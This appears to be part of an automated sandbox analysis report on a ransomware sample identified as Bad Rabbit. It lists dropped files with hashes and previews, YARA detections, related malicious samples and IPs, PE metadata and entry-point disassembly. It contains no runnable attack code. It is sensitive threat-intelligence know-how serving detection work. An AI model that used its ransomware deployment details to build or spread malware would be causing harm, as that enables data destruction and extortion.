                    7Y18r(251).exeGet hashmaliciousBdaejecBrowse
                    • 172.234.222.143
                    https://forms.office.com/r/kiNP3VZaGzGet hashmaliciousUnknownBrowse
                    • 80.67.82.187
                    7Y18r(155).exeGet hashmaliciousUnknownBrowse
                    • 172.234.222.138
                    Fd_HR24 Jul, 2024.pdfGet hashmaliciousPhisherBrowse
                    • 2.16.100.168
                    https://url5041.app.lucid.co/uni/ls/click?upn=u001.9CEiYqsCeDB7JcEaXQIz-2F9XjjPqk-2Fb4pFcLw69B6WqTy-2BbVFLiir3sSJZjbRo6mBAwRtKNr9Kf4WztrdCBts7iyzvcJ-2FIUH0XDrcbuiiKrlzy8ZwzSxYR1urVGEa2H8lG0Sg7ExDExUtTEJeACnxEcvsJ4CnFcY2OyyabtZjsqjBmQJR0iCaQNYCn9tJqfPt0sqRsrpUZbmtTsF5u4sk76aC5ja3Exi0TVSSBuxtzkkrePRrkTP-2FRoxSefUr1y9ilFhR_7YHA5TjKTAFn3LEZM-2F5lkHKyiA7Z3uxS7g7w0lpFY3VgLh-2FDGXI29ABs2GTmbGZIZHIxymEIAIiyGRh1AnBalmp58yag9E-2FrtA2h0nETB9HIcrFd1W-2BMglDx2EcdWaE0YUaZKghF9gUd9evpWd9o10VlCUS2n6DDMef1lVzEPNeAVIceaFC5X-2FwVIdJYlE5ubbjTe48aOxl7EYAkQAbI29zMPLBfzmo3-2F0oDrCz1NV8Z-2BgLjNSkhEL0v7ztjcjSQNYmg2ZtX7GcpdQCCaWNVfhkazGgvvJB3QcWd-2Fo6uMwkENEvM1i8Q5dxjk3O7SagsKeqlZGHyVQYiVQV70Bj-2BqwPqn7sRJMYA1CWG3MbbSEiFggnHBU9leFka7-2BLjrmTxclzDNBbGoPiatzLWpKmVvw-2Bx5nC-2FbsV4WwngsYxWK1QG1aOsoJu-2FNsl5G06ywgOfHOifxw2PEX15DLqK9LKLpY23-2B0gBFiHHbP5xi3TlZqqdPIKY76qvnZKXKkRHP7lkjW54-2BjkWiD-2BFCJF-2BYwCLISwPacjQQKLVdWymA0jKWf0m780jvwQKochVtFIfu-2BJ9NnI-2BB2EwWIxQXcbAMYwMXcMBTQTHy61gyJ3FTzWhBE5wfCKo-2F8oXN5UhSp4kSbC0WEoFb3T831Z02n3p5vAL-2Ftzsl33DNu9nwqX-2FymwJG6bbNN49b2LwjYn6qVJYWS5SHBoNvXFMznGKBB-2Fn-2B5ec0wzJuS2t1Z7ZojX-2BZTbH-2F00rb4HPN-2BmX2VUh9CatGg9L1JM7vsjjRJrthuxEvN6-2BOqDHpRQ-2FjJ2ng1sbFzjs5LWXRhQ7AwghmMB4i-2FOI7rRtGet hashmaliciousUnknownBrowse
                    • 2.22.61.163
                    https://forms.office.com/Pages/ResponsePage.aspx?id=q9W6SpYqak-gDukUxOfbFKrxeFwi_dtNtj4fQh9gMzZUMTZPR0tNMVg5QkozVFpKQlZSVDA0SExBWi4uGet hashmaliciousHTMLPhisherBrowse
                    • 173.222.108.211
                    65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeGet hashmaliciousBdaejec, SocelarsBrowse
                    • 172.232.25.148
                    4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                    • 172.232.4.213

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Windows\cscc.dat09490699.exeGet hashmaliciousUnknownBrowse
                      09490699.exeGet hashmaliciousUnknownBrowse
                        07bb0738.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                          4d44bed6.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                            63416c4d.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                              irH9zMhZub.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                                1jDe7zWnoe.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, Petya, RedLineBrowse
                                  bpkAAJptGv.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                                    4W5dQXszUV.exeGet hashmaliciousBabuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLineBrowse
                                      infp.dllGet hashmaliciousMimikatzBrowse

                                        Created / dropped Files

                                        C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\b30f00dcc49b7918ec43eaee6c30dbc5_9e146be9-c76a-4720-bcdb-53011b87bd06

                                        Download File
                                        Process:C:\Windows\dispci.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):54
                                        Entropy (8bit):1.937652566318511
                                        Encrypted:false
                                        SSDEEP:3:/lzlsgJI12l:QgGgl
                                        MD5:C8AA5F9A1CAE94281B68BCBE2045B512
                                        SHA1:9B566DB304B2CA9163C3774FCD96C33CD99EF7BA
                                        SHA-256:E7D1B33769635599FC362D398FBA21A7CD7B456CE074AFB1632D54F7686E3F4A
                                        SHA-512:6FF68D7252003229FBF64E799E4ED32315CA1F2C5386A2FB6B182E37AB63C55FC06215F95CCDCE9B3812E7C612EEE45659F8BEB7A7A9ADFD61EFA83E39400C42
                                        Malicious:false
                                        Preview:........................................user-PC$.

                                        C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8192
                                        Entropy (8bit):0.35901589905449205
                                        Encrypted:false
                                        SSDEEP:6:6xboaaD0JOCEfMuaaD0JOCEfMKQmDkxboaaD0JOCEfMuaaD0JOCEfMKQmD:ZaaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                        MD5:7D48941DB05D2D1C9A0C52739933543F
                                        SHA1:4FF1446A7D5DA6BBEA145000B00A9F4FFED90930
                                        SHA-256:C436AB7F36E238365FDDF5BDFEB9EBFEFACE94AD0FEB79C571182DA968815D87
                                        SHA-512:41C7DA95797437840014733F7021883E034503A9D8F07F7C9A0B1131A869A29A6E00D4E9FA99EEDAFBDD2F0DFDAFFB0A7671D8F666DA0E2023CA887E4BA0FB62
                                        Malicious:false
                                        Preview:*.>...........f.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................f.............................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.7106941242474595
                                        Encrypted:false
                                        SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq4:2JIB/wUKUKQncEmYRTwh0c
                                        MD5:8D5C5D37FA2437A940F999F4844C9EF1
                                        SHA1:E1499807E571DDB62107C9392BF72507CCCC67B1
                                        SHA-256:607977E9AE62E0214D28B03F55490896D361D6C69BE24B8532150ECDD2B1CDE4
                                        SHA-512:D0DC08C67B7B4007B4946DC579EC2747845730E3698C45C1D341C2E0778B56791D9AD71D0D813D3A21A65879CEAA0D5919C509AAC6830E1670B49E915D204A3E
                                        Malicious:false
                                        Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x26cf657f, page size 16384, Windows version 10.0
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.6650649744706726
                                        Encrypted:false
                                        SSDEEP:1536:dSB2ESB2SSjlK/2502y0IEWBqbMo5g5+Ykr3g16z2UPkLk+kK+UJ8xUJSSiWjFjF:dazaU+uroc2U5Si6
                                        MD5:F725A5881A0B44F95C6EE160D1588C57
                                        SHA1:7EFB30A18BEC7FF6F542A5EA3E8D76B73516CB26
                                        SHA-256:770B447CEDF198452E4DE628F6935189D8E2174805009368324411F377361B74
                                        SHA-512:B3EDF7F6E84DFD0D386BABE133D95727CAD9EA37294409250F6AB1C5581B69331126C304E94FC73EE98F819EEF8726AC87BAA3B91B88E0B49E342A54F3295B9A
                                        Malicious:false
                                        Preview:&.e.... .......#.......X\...;...{......................0.e..........|..8....|Y.h.b..........|..0.e.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................T......|..........................|...........................#......0.e.....................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.07928127155298045
                                        Encrypted:false
                                        SSDEEP:3:ZYtlOetYeqs/64LUK/7me/YllkqqG9lXlZOS:CXrzRC+DmeQVr
                                        MD5:FB708D46A4D0A703ECC49C8751EB7CF7
                                        SHA1:A0BE382E27A3852519F0D9F1A5A057C1B2B9B264
                                        SHA-256:9BF2FFE3874464A5898E11495A1ED2924FC0E2B5CE563578E266D2BE9008F969
                                        SHA-512:2DDB72C5EE18C91EB91E6138E25DEC1E6F5310341158FEA548CF8FEA18D34327A1409F3F462D9A62AD373A78D21B4BC4179CB568CDBCD10F0C54AD4215272013
                                        Malicious:false
                                        Preview:.hlL.....................................;...{..8....|Y......|...............|E......|...w/q.....|e.........................|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):697182
                                        Entropy (8bit):5.235446634875911
                                        Encrypted:false
                                        SSDEEP:12288:DBXiKZWAAllNJheaP7Qata8GtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDp/10:q+
                                        MD5:FFEAA4841F005787CA2DA11BE1D08C72
                                        SHA1:5B2E34B55494CD6C43E346C8D5FE61D59D43D0B3
                                        SHA-256:2A2ABA9D1E19C03B2C29B1C5383E719AADD4A326ABE4E9FB28B0816BEABE5997
                                        SHA-512:0A37DB03C9E04594177C8AEEB886CEE8C498B9B2676C677584D7137D0AAAEA5B333FD28263C1CA6F345785A5590F2BC9F844A0DFCDF128EBFA53BAD62158757A
                                        Malicious:false
                                        Preview:.....c(i.rI.(....,.3.;...a.&Tw.O..].$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........

                                        C:\ProgramData\Microsoft\Windows\ClipSvc\tokens.dat.bak (copy)

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):697182
                                        Entropy (8bit):5.235446634875911
                                        Encrypted:false
                                        SSDEEP:12288:DBXiKZWAAllNJheaP7Qata8GtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDp/10:q+
                                        MD5:FFEAA4841F005787CA2DA11BE1D08C72
                                        SHA1:5B2E34B55494CD6C43E346C8D5FE61D59D43D0B3
                                        SHA-256:2A2ABA9D1E19C03B2C29B1C5383E719AADD4A326ABE4E9FB28B0816BEABE5997
                                        SHA-512:0A37DB03C9E04594177C8AEEB886CEE8C498B9B2676C677584D7137D0AAAEA5B333FD28263C1CA6F345785A5590F2BC9F844A0DFCDF128EBFA53BAD62158757A
                                        Malicious:false
                                        Preview:.....c(i.rI.(....,.3.;...a.&Tw.O..].$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........

                                        C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):999
                                        Entropy (8bit):4.966299883488245
                                        Encrypted:false
                                        SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                        MD5:24567B9212F806F6E3E27CDEB07728C0
                                        SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                        SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                        SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                        Malicious:false
                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..

                                        C:\Users\Public\Desktop\DECRYPT.lnk

                                        Download File
                                        Process:C:\Windows\dispci.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Thu Jul 25 05:18:49 2024, mtime=Thu Jul 25 05:18:54 2024, atime=Thu Jul 25 05:18:49 2024, length=142848, window=hide
                                        Category:dropped
                                        Size (bytes):725
                                        Entropy (8bit):4.739813645567508
                                        Encrypted:false
                                        SSDEEP:12:8iykIKQm/fLDMwXXR7o0VcfKjT/vNjAcMR6W+IWgL6CNbKblpJZpJaILYumV:81b+nHRo0uijTnpALl+IWt2bUlpJZpJs
                                        MD5:C6EE233E84413B9FAB7BD9220A5789B9
                                        SHA1:C76A37D5D67ECE64F3E55581EBAF8549F6AF8DBF
                                        SHA-256:34EACD82ECA6AE32B7453ABD05CBF86EBCB60A6336C7FBF607B6FF487EEB1EF1
                                        SHA-512:984CF26A48DC0FDA684E0E0B961E4166C6D45207E66EEDC9B41EBB84BF76BAAAF5316194C8A44B55787E32AEDDFC9C79EB44302DF584ECA3925D0AF5FCEF9A88
                                        Malicious:false
                                        Preview:L..................F.... .....i.Z.......Z.....i.Z................................P.O. .:i.....+00.../C:\...................V.1......X[2..Windows.@......OwH.X[2....3.....................I...W.i.n.d.o.w.s.....`.2......XY2 .dispci.exe..F.......XY2.XY2..........................M.[.d.i.s.p.c.i...e.x.e.......D...............-.......C..................C:\Windows\dispci.exe....D.E.C.R.Y.P.T.......\.....\.....\.W.i.n.d.o.w.s.\.d.i.s.p.c.i...e.x.e.........$..................C..B..g..(.#....`.......X.......134349...........hT..CrF.f4... .u../Tc...,......hT..CrF.f4... .u../Tc...,..............A...1SPS.XF.L8C....&.m.%................S.-.1.-.5.-.1.8.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                        C:\Windows\D99F.tmp

                                        Download File
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):62328
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:C7CA77D847F1802502EF3B9228D388E4
                                        SHA1:80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
                                        SHA-256:FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
                                        SHA-512:B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
                                        Malicious:true
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.306461250274409
                                        Encrypted:false
                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                        Malicious:false
                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                        C:\Windows\cscc.dat

                                        Download File
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):210632
                                        Entropy (8bit):6.677691827536191
                                        Encrypted:false
                                        SSDEEP:3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
                                        MD5:EDB72F4A46C39452D1A5414F7D26454A
                                        SHA1:08F94684E83A27F2414F439975B7F8A6D61FC056
                                        SHA-256:0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
                                        SHA-512:D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: 09490699.exe, Detection: malicious, Browse
                                        • Filename: 09490699.exe, Detection: malicious, Browse
                                        • Filename: 07bb0738.exe, Detection: malicious, Browse
                                        • Filename: 4d44bed6.exe, Detection: malicious, Browse
                                        • Filename: 63416c4d.exe, Detection: malicious, Browse
                                        • Filename: irH9zMhZub.exe, Detection: malicious, Browse
                                        • Filename: 1jDe7zWnoe.exe, Detection: malicious, Browse
                                        • Filename: bpkAAJptGv.exe, Detection: malicious, Browse
                                        • Filename: 4W5dQXszUV.exe, Detection: malicious, Browse
                                        • Filename: infp.dll, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................

                                        C:\Windows\dispci.exe

                                        Download File
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):142848
                                        Entropy (8bit):6.314365095327337
                                        Encrypted:false
                                        SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                        MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                        SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                        SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                        SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                        • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 96%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                        C:\Windows\infpub.dat

                                        Download File
                                        Process:C:\Users\user\Desktop\LisectAVT_2403002C_35.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):410760
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:C4F26ED277B51EF45FA180BE597D96E8
                                        SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                        SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                        SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                        Malicious:true
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                        Entropy (8bit):7.891833922139808
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:LisectAVT_2403002C_35.exe
                                        File size:441'910 bytes
                                        MD5:d7ad0cdda235608cb4afb702562fdcfd
                                        SHA1:358699a2bc63d26030f88b6287b07aaeb69680c5
                                        SHA256:06d269411d74cbc6026eab2776a7cded68dd3380b7e1b890f15d2210d2ff376f
                                        SHA512:4e269eb4a0d11f54d2e3ce167471b3a52cb4cb33f0766c420c0553db48c95f41c2a73fe1257669a63893a2a3e9cb0c1920a516d1ba780faea3f46e97260d2636
                                        SSDEEP:12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR6:vT56NbqWRwZaEr3yt2O3XR6
                                        TLSH:0C9412426729EE92D1E1B8F84093E7CC4BB97B090FB991EF9D993485CC79B8319380D5
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2..G2..G2..?...G2..?...G2......G2......G2..?...G2..G3..G2......G2......G2.Rich.G2.........................PE..L......Y...

                                        File Icon

                                        Icon Hash:2144b26d6c76b24d

                                        Static PE Info

                                        General

                                        Entrypoint:0x4012c0
                                        Entrypoint Section:.text
                                        Digitally signed:true
                                        Imagebase:0x400000
                                        Subsystem:windows cui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x59EC0396 [Sun Oct 22 02:33:58 2017 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:e3bda9df66f1f9b2b9b7b068518f2af1

                                        Authenticode Signature

                                        Signature Valid:
                                        Signature Issuer:
                                        Signature Validation Error:
                                        Error Number:
                                        Not Before, Not After
                                          Subject Chain
                                            Version:
                                            Thumbprint MD5:
                                            Thumbprint SHA-1:
                                            Thumbprint SHA-256:
                                            Serial:

                                            Entrypoint Preview

                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            mov eax, 000012ACh
                                            call 00007F24BC820348h
                                            mov eax, dword ptr [00408000h]
                                            xor eax, ebp
                                            mov dword ptr [ebp-04h], eax
                                            push esi
                                            mov esi, dword ptr [00404004h]
                                            push edi
                                            call esi
                                            mov edi, eax
                                            test edi, edi
                                            je 00007F24BC820152h
                                            lea eax, dword ptr [ebp-00001250h]
                                            push eax
                                            mov dword ptr [ebp-00001250h], 00000000h
                                            call esi
                                            push eax
                                            call dword ptr [00404050h]
                                            mov esi, eax
                                            test esi, esi
                                            je 00007F24BC82012Eh
                                            cmp dword ptr [ebp-00001250h], 01h
                                            jne 00007F24BC81FFD3h
                                            xor eax, eax
                                            lea ebx, dword ptr [ebx+00000000h]
                                            movzx ecx, word ptr [eax+00406CF0h]
                                            mov word ptr [ebp+eax-0000124Ch], cx
                                            add eax, 02h
                                            test cx, cx
                                            jne 00007F24BC81FF9Bh
                                            jmp 00007F24BC820008h
                                            mov eax, dword ptr [esi]
                                            push eax
                                            push edi
                                            call dword ptr [00404060h]
                                            mov ecx, dword ptr [esi]
                                            add esp, 08h
                                            lea esi, dword ptr [ecx+02h]
                                            jmp 00007F24BC81FFB5h
                                            lea ecx, dword ptr [ecx+00h]
                                            mov dx, word ptr [ecx]
                                            add ecx, 02h
                                            test dx, dx
                                            jne 00007F24BC81FFA7h
                                            sub ecx, esi
                                            sar ecx, 1
                                            cmp word ptr [eax+ecx*2], 0022h
                                            lea eax, dword ptr [eax+ecx*2]
                                            jne 00007F24BC81FFB5h
                                            add eax, 02h
                                            cmp word ptr [eax], 0020h
                                            jne 00007F24BC81FFB5h
                                            add eax, 02h
                                            lea edx, dword ptr [ebp-0000124Ch]
                                            sub edx, eax
                                            lea ecx, dword ptr [ecx+00h]
                                            movzx ecx, word ptr [eax]
                                            mov word ptr [edx+eax], cx

                                            Rich Headers

                                            Programming Language:
                                            • [ C ] VS2008 SP1 build 30729
                                            • [ASM] VS2008 SP1 build 30729
                                            • [ C ] VS2013 UPD5 build 40629
                                            • [ASM] VS2013 UPD5 build 40629
                                            • [IMP] VS2008 SP1 build 30729
                                            • [LNK] VS2010 SP1 build 40219

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6d8c0x64.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x7088.rsrc
